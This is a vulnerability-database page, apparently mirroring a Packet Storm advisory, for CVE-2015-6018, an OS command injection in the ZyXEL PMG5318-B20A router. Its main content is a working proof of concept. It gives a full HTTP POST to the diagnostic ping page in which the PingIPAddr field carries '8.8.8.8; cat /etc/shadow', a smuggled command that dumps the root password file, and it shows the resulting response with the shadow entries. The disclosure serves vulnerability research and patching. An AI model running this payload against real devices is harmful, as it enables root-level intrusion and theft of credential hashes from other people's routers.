Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKarn GaneshenPACKETSTORM:133960
HistoryOct 14, 2015 - 12:00 a.m.

ZyXEL PMG5318-B20A OS Command Injection

2015-10-1400:00:00
Karn Ganeshen
packetstormsecurity.com
30

0.015 Low

EPSS

Percentile

86.8%

JSON
`# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]  
# Discovered by: Karn Ganeshen  
# CERT VU# 870744  
# Vendor Homepage: [www.zyxel.com]  
# Version Reported: [Firmware version V100AANC0b5]  
# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018  
]  
  
  
*Vulnerability Details*  
  
CWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input  
Validation - CVE-2015-6018  
  
The diagnostic ping function's PingIPAddr parameter in the ZyXEL  
PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user  
input. An attacker can execute arbitrary commands as root.  
  
*OS Command Injection PoC*  
  
The underlying services are run as 'root'. It therefore, allows dumping  
system password hashes.  
  
*HTTP Request*  
  
POST /diagnostic/diagnostic_general.cgi HTTP/1.1  
Host: <IP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101  
Firefox/40.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://<IP>/diagnostic/diagnostic_general.cgi  
Cookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive  
Content-Type: multipart/form-data; boundary=--------------------------  
-12062103314079176991367286444  
Content-Length: 451  
  
β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”12062103314079176991367286444  
Content-Disposition: form-data; name="InfoDisplay”  
β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”12062103314079176991367286444  
Content-Disposition: form-data; name="*PingIPAddr*"  
*8.8.8.8; cat /etc/shadow *  
β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”β€”12062103314079176991367286444  
Content-Disposition: form-data; name="Submit"  
Ping  
….  
*HTTP Response *  
.....  
<snipped>  
<br class="clearfloat" />  
<!-- configuration beginning -->  
<div class="headline"><span class="cTitle">General</span></div> <table  
width="90%" border="0" align="center" cellpadding="0" cellspacing="0"  
class="cfgpadding">  
<tr>  
<td nowrap="nowrap"><textarea name="InfoDisplay" rows="15" cols="100"  
readonly="readonly”>  
  
  
*root:<hash>:15986:0:99999:7:::  
lp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::  
user:<hash>:16035:0:99999:7:::*  
</textarea></td>  
</tr>  
</table>  
<table width="90%" border="0" align="center" cellpadding="0"  
cellspacing="0" class="cfgpadding">  
<tr>  
-----------------------------12062103314079176991367286444--  
  
--   
Best Regards,  
Karn Ganeshen  
`

Related

cve 1
cvelist 1
nvd 1
zdt 1
exploitpack 1
prion 1
exploitdb 1
cert 1
cve
cve
CVE-2015-6018
2015-12-31 05:59:16
cvelist
cvelist
CVE-2015-6018
2015-12-31 02:00:00
nvd
nvd
CVE-2015-6018
2015-12-31 05:59:16
zdt
zdt
ZyXEL PMG5318-B20A - OS Command Injection Vulnerability
2015-10-14 00:00:00
exploitpack
exploitpack
ZYXEL PMG5318-B20A - OS Command Injection
2015-10-14 00:00:00
prion
prion
Design/Logic Flaw
2015-12-31 05:59:00
exploitdb
exploitdb
ZYXEL PMG5318-B20A - OS Command Injection
2015-10-14 00:00:00
cert
cert
ZyXEL NBG-418N, PMG5318-B20A and P-660HW-T1 routers contain multiple vulnerabilities
2015-10-13 00:00:00

0.015 Low

EPSS

Percentile

86.8%

JSON
Related for PACKETSTORM:133960
cve1cvelist1nvd1zdt1exploitpack1prion1exploitdb1cert1